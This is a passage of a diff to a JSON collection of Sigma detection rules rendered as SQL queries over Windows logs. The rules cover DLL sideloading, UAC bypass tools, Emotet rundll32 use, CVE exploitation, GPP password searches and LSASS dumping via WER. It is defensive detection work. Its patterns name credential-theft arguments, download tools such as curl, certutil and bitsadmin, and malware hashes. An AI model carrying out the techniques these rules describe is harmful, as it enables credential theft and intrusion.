'%\\\\dsound.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\DispBroker.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\FXSRESM.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptnet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\COMRES.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igdumdim64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igd10iumd64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igd12umd64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igdusc64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WLBSCTRL.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\TSMSISrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\TSVIPSrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wow64log.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WptsExtensions.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemcomn.dll' ESCAPE '\\') AND NOT (((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SystemTemp\\\\%' ESCAPE '\\')) OR (ImageLoaded LIKE 'C:\\\\Program Files\\\\Common Files\\\\microsoft 
shared\\\\ClickToRun\\\\AppVPolicy.dll' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ClickToRun\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (ImageLoaded LIKE 'C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\DellInc.DellSupportAssistforPCs%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\backgroundTaskHost.exe%' ESCAPE '\\') AND ImageLoaded LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\DellInc.DellSupportAssistforPCs%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\cleanmgr.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\ssshim.dll' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\$WINDOWS.~BT\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\DellInc.DellSupportAssistforPCs%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\wldp.dll' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\xordump.exe' ESCAPE '\\' OR (CommandLine LIKE '% -process lsass.exe %' ESCAPE '\\' OR CommandLine LIKE '% -m comsvcs %' ESCAPE '\\' OR CommandLine LIKE '% -m dbghelp %' ESCAPE '\\' OR CommandLine LIKE '% -m dbgcore %' ESCAPE '\\')))" ], - "filename": "image_load_side_load_from_non_system_location.yml" + "filename": "proc_creation_win_hktl_xordump.yml" }, { - "title": "PCRE.NET Package Image Load", - "id": "84b0a8f3-680b-4096-a45b-e9a89221727c", + "title": "Potential CVE-2021-40444 Exploitation Attempt", + "id": "894397c6-da03-425c-a589-3d09e7d1f750", "status": "test", - "description": "Detects processes loading modules related to PCRE.NET package", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects potential exploitation of CVE-2021-40444 via suspicious process patterns seen in in-the-wild exploitations", + "author": "Florian Roth (Nextron Systems), 
@neonprimetime", "tags": [ "attack.execution", "attack.t1059" 
@@ -5770,34 +5598,40 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ImageLoaded LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\ba9ea7344a4a5f591d6e5dc32a13494b\\\\%' ESCAPE '\\'" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\control.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\excel.exe' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%\\\\control.exe input.dll' ESCAPE '\\' OR CommandLine LIKE '%\\\\control.exe\" input.dll' ESCAPE '\\')))" ], - "filename": "image_load_pcre_net_load.yml" + "filename": "proc_creation_win_exploit_cve_2021_40444.yml" }, { - "title": "Malicious DLL Load By Compromised 3CXDesktopApp", - "id": "d0b65ad3-e945-435e-a7a9-438e62dd48e9", - "status": "experimental", - "description": "Detects DLL load activity of known compromised DLLs used in by the compromised 3CXDesktopApp", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Exploited CVE-2020-10189 Zoho ManageEngine", + "id": "846b866e-2a57-46ee-8e16-85fa92759be7", + "status": "test", + "description": "Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.initial_access", + "attack.t1190", + "attack.execution", + "attack.t1059.001", + "attack.t1059.003", + "attack.s0190", + "cve.2020.10189" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((Hashes LIKE '%SHA256=7986BBAEE8940DA11CE089383521AB420C443AB7B15ED42AED91FD31CE833896%' ESCAPE '\\' OR Hashes LIKE '%SHA1=BF939C9C261D27EE7BB92325CC588624FCA75429%' ESCAPE '\\' OR Hashes LIKE '%MD5=74BC2D0B6680FAA1A5A76B27E5479CBC%' ESCAPE '\\' OR Hashes LIKE 
'%SHA256=11BE1803E2E307B647A8A7E02D128335C448FF741BF06BF52B332E0BBF423B03%' ESCAPE '\\' OR Hashes LIKE '%SHA1=20D554A80D759C50D6537DD7097FED84DD258B3E%' ESCAPE '\\' OR Hashes LIKE '%MD5=82187AD3F0C6C225E2FBA0C867280CC9%' ESCAPE '\\' OR Hashes LIKE '%SHA256=F79C3B0ADB6EC7BCC8BC9AE955A1571AAED6755A28C8B17B1D7595EE86840952%' ESCAPE '\\' OR Hashes LIKE '%SHA1=894E7D4FFD764BB458809C7F0643694B036EAD30%' ESCAPE '\\' OR Hashes LIKE '%MD5=11BC82A9BD8297BD0823BCE5D6202082%' ESCAPE '\\' OR Hashes LIKE '%SHA256=8AB3A5EAAF8C296080FADF56B265194681D7DA5DA7C02562953A4CB60E147423%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3B3E778B647371262120A523EB873C20BB82BEAF%' ESCAPE '\\' OR Hashes LIKE '%MD5=7FAEA2B01796B80D180399040BB69835%' ESCAPE '\\') OR sha256 IN ('7986BBAEE8940DA11CE089383521AB420C443AB7B15ED42AED91FD31CE833896', '11BE1803E2E307B647A8A7E02D128335C448FF741BF06BF52B332E0BBF423B03', 'F79C3B0ADB6EC7BCC8BC9AE955A1571AAED6755A28C8B17B1D7595EE86840952', '8AB3A5EAAF8C296080FADF56B265194681D7DA5DA7C02562953A4CB60E147423') OR sha1 IN ('BF939C9C261D27EE7BB92325CC588624FCA75429', '20D554A80D759C50D6537DD7097FED84DD258B3E', '894E7D4FFD764BB458809C7F0643694B036EAD30', '3B3E778B647371262120A523EB873C20BB82BEAF') OR md5 IN ('74BC2D0B6680FAA1A5A76B27E5479CBC', '82187AD3F0C6C225E2FBA0C867280CC9', '11BC82A9BD8297BD0823BCE5D6202082', '7FAEA2B01796B80D180399040BB69835'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%DesktopCentral\\_Server\\\\jre\\\\bin\\\\java.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\query.exe' ESCAPE 
'\\'))" ], - "filename": "image_load_malware_3cx_compromise_susp_dll.yml" + "filename": "proc_creation_win_exploit_cve_2020_10189.yml" }, { - "title": "UAC Bypass Using Iscsicpl - ImageLoad", - "id": "9ed5959a-c43c-4c59-84e3-d28628429456", + "title": "HackTool - UACMe Akagi Execution", + "id": "d38d2fa4-98e6-4a24-aff1-410b0c9ad177", "status": "experimental", - "description": "Detects the \"iscsicpl.exe\" UAC bypass technique that leverages a DLL Search Order hijacking technique to load a custom DLL's from temp or a any user controlled location in the users %PATH%", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the execution of UACMe, a tool used for UAC bypasses, via default PE metadata", + "author": "Christian Burkard (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", "attack.privilege_escalation", 
@@ -5808,977 +5642,973 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\iscsicpl.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\iscsiexe.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\' AND ImageLoaded LIKE '%iscsiexe.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Product = 'UACMe' OR Company IN ('REvol Corp', 'APT 92', 'UG North', 'Hazardous Environments', 'CD Project Rekt') OR Description IN ('UACMe main module', 'Pentesting utility') OR OriginalFileName IN ('Akagi.exe', 'Akagi64.exe') OR (NewProcessName LIKE '%\\\\Akagi64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Akagi.exe' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=767637C23BB42CD5D7397CF58B0BE688%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=14C4E4C72BA075E9069EE67F39188AD8%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=7D010C6BB6A3726F327F7E239166D127%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=89159BA4DD04E4CE5559F132A9964EB3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5834ED4291BDEB928270428EBBAF7604%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3DE09703C8E79ED2CA3F01074719906B%' ESCAPE '\\') OR Imphash IN ('767637c23bb42cd5d7397cf58b0be688', '14c4e4c72ba075e9069ee67f39188ad8', '3c782813d4afce07bbfc5a9772acdbdc', '7d010c6bb6a3726f327f7e239166d127', '89159ba4dd04e4ce5559f132a9964eb3', '6f33f4a5fc42b8cec7314947bd13f30f', '5834ed4291bdeb928270428ebbaf7604', '5a8a8a43f25485e7ee1b201edcbc7a38', 'dc7d30b90b2d8abf664fbed2b1b59894', '41923ea1f824fe63ea5beb84db7a3e74', '3de09703c8e79ed2ca3f01074719906b')))" ], - "filename": 
"image_load_uac_bypass_iscsicpl.yml" + "filename": "proc_creation_win_hktl_uacme.yml" }, { - "title": "DotNet CLR DLL Loaded By Scripting Applications", - "id": "4508a70e-97ef-4300-b62b-ff27992990ea", - "status": "test", - "description": "Detects .NET CLR DLLs being loaded by scripting applications such as wscript or cscript. This could be an indication of potential suspicious execution.", - "author": "omkar72, oscd.community", + "title": "Suspicious Rundll32 Without Any CommandLine Params", + "id": "1775e15e-b61b-4d14-a1a3-80981298085a", + "status": "experimental", + "description": "Detects suspicious start of rundll32.exe without any parameters as found in CobaltStrike beacon activity", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.t1055" + "attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ - "Unknown" + "Possible but rare" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msxsl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') AND (ImageLoaded LIKE '%\\\\clr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscoree.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscorlib.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND NOT ((ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Microsoft\\\\Edge\\\\%' ESCAPE '\\'))))" ], - "filename": "image_load_susp_script_dotnet_clr_dll_load.yml" + "filename": "proc_creation_win_rundll32_no_params.yml" }, { - "title": "Potential Wazuh 
Security Platform DLL Sideloading", - "id": "db77ce78-7e28-4188-9337-cf30e2b3ba9f", - "status": "experimental", - "description": "Detects potential DLL sideloading of DLLs that are part of the Wazuh security platform", - "author": "X__Junior", + "title": "Potential Emotet Rundll32 Execution", + "id": "54e57ce3-0672-46eb-a402-2c0948d5e3e9", + "status": "test", + "description": "Detecting Emotet DLL loading by looking for rundll32.exe processes with command lines ending in ,RunDLL or ,Control_RunDLL", + "author": "FPT.EagleEye", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\libwazuhshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\libwinpthread-1.dll' ESCAPE '\\') AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\ossec-agent\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Inkscape\\\\bin\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Pidgin\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%,RunDLL' ESCAPE '\\' OR CommandLine LIKE '%,Control\\_RunDLL' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%.dll,Control\\_RunDLL' ESCAPE '\\' OR CommandLine LIKE '%.dll\",Control\\_RunDLL' ESCAPE '\\' OR CommandLine LIKE '%.dll'',Control\\_RunDLL' ESCAPE '\\')) OR (ParentProcessName LIKE '%\\\\tracker.exe' ESCAPE '\\')))" ], - "filename": "image_load_side_load_wazuh.yml" + "filename": "proc_creation_win_malware_emotet_rundll32_execution.yml" }, { - "title": "APT PRIVATELOG Image Load Pattern", - "id": "33a2d1dd-f3b0-40bd-8baf-7974468927cc", + "title": "Findstr GPP Passwords", + "id": "91a2c315-9ee6-4052-a853-6f6a8238f90d", "status": 
"test", - "description": "Detects an image load pattern as seen when a tool named PRIVATELOG is used and rarely observed under legitimate circumstances", - "author": "Florian Roth (Nextron Systems)", + "description": "Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. This value can be decrypted with gpp-decrypt.", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.credential_access", + "attack.t1552.006" ], "falsepositives": [ - "Rarely observed" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\clfsw32.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND (CommandLine LIKE '%cpassword%' ESCAPE '\\' AND CommandLine LIKE '%\\\\sysvol\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.xml%' ESCAPE '\\'))" ], - "filename": "image_load_usp_svchost_clfsw32.yml" + "filename": "proc_creation_win_findstr_gpp_passwords.yml" }, { - "title": "Abusing Azure Browser SSO", - "id": "50f852e6-af22-4c78-9ede-42ef36aa3453", + "title": "Suspicious Spool Service Child Process", + "id": "dcdbc940-0bff-46b2-95f3-2d73f848e33b", "status": "test", - "description": "Detects abusing Azure Browser SSO by requesting OAuth 2.0 refresh tokens for an Azure-AD-authenticated Windows user (i.e. the machine is joined to Azure AD and a user logs in with their Azure AD account)\nwanting to perform SSO authentication in the browser.\nAn attacker can use this to authenticate to Azure AD in a browser as that user.\n", - "author": "Den Iuzvyk", + "description": "Detects suspicious print spool service (spoolsv.exe) child processes.", + "author": "Justin C. 
(@endisphotic), @dreadphones (detection), Thomas Patzke (Sigma rule)", "tags": [ - "attack.defense_evasion", + "attack.execution", + "attack.t1203", "attack.privilege_escalation", - "attack.t1574.002" + "attack.t1068" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%MicrosoftAccountTokenProvider.dll' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\BackgroundTaskHost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\devenv.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MicrosoftEdge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\OneDrive.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msedgewebview2.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\OneDrive.exe' ESCAPE '\\') OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\%' ESCAPE '\\' OR NewProcessName = ''))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\spoolsv.exe' ESCAPE '\\' AND IntegrityLevel = 'System') AND ((((((NewProcessName LIKE '%\\\\gpupdate.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nltest.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskkill.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskmgr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\findstr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wget.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\accesschk.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR NewProcessName LIKE 
'%\\\\bcdedit.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cipher.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\write.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wuauclt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\query.exe' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') AND NOT (CommandLine LIKE '%start%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%.spl%' ESCAPE '\\' OR CommandLine LIKE '%route add%' ESCAPE '\\' OR CommandLine LIKE '%program files%' ESCAPE '\\')))) OR (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%add portopening%' ESCAPE '\\' OR CommandLine LIKE '%rule name%' ESCAPE '\\')))) OR ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND NOT (CommandLine LIKE '%.spl%' ESCAPE '\\'))) OR ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND CommandLine LIKE '%rundll32.exe' ESCAPE '\\')))" ], - "filename": "image_load_abusing_azure_browser_sso.yml" + "filename": "proc_creation_win_spoolsv_susp_child_processes.yml" }, { - "title": "DLL Loaded From Suspicious Location Via Cmspt.EXE", - "id": "75e508f7-932d-4ebc-af77-269237a84ce1", + "title": "Schtasks Creation Or Modification With SYSTEM Privileges", + "id": "89ca78fd-b37c-4310-b3d3-81a023f83936", "status": "experimental", - "description": "Detects cmstp loading \"dll\" or \"ocx\" files from suspicious locations", + "description": "Detects the creation or update of a scheduled task to run with \"NT AUTHORITY\\SYSTEM\" privileges", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.003" + 
"attack.execution", + "attack.persistence", + "attack.t1053.005" ], "falsepositives": [ - "Unikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Users\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\') AND (ImageLoaded LIKE '%.dll' ESCAPE '\\' OR ImageLoaded LIKE '%.ocx' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND (CommandLine LIKE '% /change %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\') AND CommandLine LIKE '%/ru %' ESCAPE '\\' AND (CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM %' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%TeamViewer\\_.exe%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/TN TVInstallRestore%' ESCAPE '\\') OR ((CommandLine LIKE '%/Create /F /RU System /SC WEEKLY /TN AviraSystemSpeedupVerify /TR %' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Program Files (x86)\\\\Avira\\\\System Speedup\\\\setup\\\\avira\\_speedup\\_setup.exe%' ESCAPE '\\' OR CommandLine LIKE '%/VERIFY /VERYSILENT /NOSTART /NODOTNET /NORESTART\" /RL HIGHEST%' ESCAPE '\\'))))" ], - "filename": "image_load_cmstp_load_dll_from_susp_location.yml" + "filename": "proc_creation_win_schtasks_system.yml" }, { - "title": "Diagnostic Library Sdiageng.DLL Loaded By Msdt.EXE", - "id": "ec8c4047-fad9-416a-8c81-0f479353d7f6", + "title": "Potential Credential Dumping Via WER", + "id": "9a4ccd1a-3526-4d99-b980-9f9c5d3a6ff3", "status": "experimental", - "description": "Detects both of CVE-2022-30190 (Follina) and DogWalk vulnerabilities exploiting 
msdt.exe binary to load the \"sdiageng.dll\" library", - "author": "Greg (rule)", + "description": "Detects potential credential dumping via Windows Error Reporting LSASS Shtinkering technique which uses the Windows Error Reporting to dump lsass", + "author": "@pbssubhash , Nasreddine Bencherchali", "tags": [ - "attack.defense_evasion", - "attack.t1202", - "cve.2022.30190" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Windows Error Reporting might produce similar behavior. In that case, check the PID associated with the \"-p\" parameter in the CommandLine." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\sdiageng.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\Werfault.exe' ESCAPE '\\' OR OriginalFileName = 'WerFault.exe') AND ((ParentUser LIKE '%AUTHORI%' ESCAPE '\\' OR ParentUser LIKE '%AUTORI%' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND CommandLine LIKE '% -u -p %' ESCAPE '\\' AND CommandLine LIKE '% -ip %' ESCAPE '\\' AND CommandLine LIKE '% -s %' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\')))" ], - "filename": "image_load_dll_sdiageng_load_by_msdt.yml" + "filename": "proc_creation_win_werfault_lsass_shtinkering.yml" }, { - "title": "Potential DLL Sideloading Of Non-Existent DLLs From System Folders", - "id": "6b98b92b-4f00-4f62-b4fe-4d1920215771", - "status": "experimental", - "description": "Detects DLL sideloading of system dlls that are not present on the system by default. 
Usually to achieve techniques such as UAC bypass and privilege escalation", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Logon Scripts (UserInitMprLogonScript)", + "id": "0a98a10c-685d-4ab0-bddc-b6bdd1d48458", + "status": "test", + "description": "Detects creation or execution of UserInitMprLogonScript persistence method", + "author": "Tom Ueltschi (@c_APT_ure), Tim Shelton", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1037.001", + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Exclude legitimate logon scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\WLBSCTRL.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\TSMSISrv.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\TSVIPSrv.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\wow64log.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\WptsExtensions.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\') AND NOT ((Signed = 'true' AND Signature = 'Microsoft Windows')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%UserInitMprLogonScript%' ESCAPE '\\' OR (ParentProcessName LIKE '%\\\\userinit.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%netlogon%.bat%' ESCAPE '\\' OR CommandLine LIKE '%UsrLogon.cmd%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\WINDOWS\\\\Explorer.EXE%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\proquota.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Citrix\\\\System32\\\\icast.exe' ESCAPE '\\')))))" ], - "filename": "image_load_side_load_non_existent_dlls.yml" + "filename": "proc_creation_win_persistence_userinitmprlogonscript.yml" }, { - "title": "Potential Rcdll.DLL Sideloading", - 
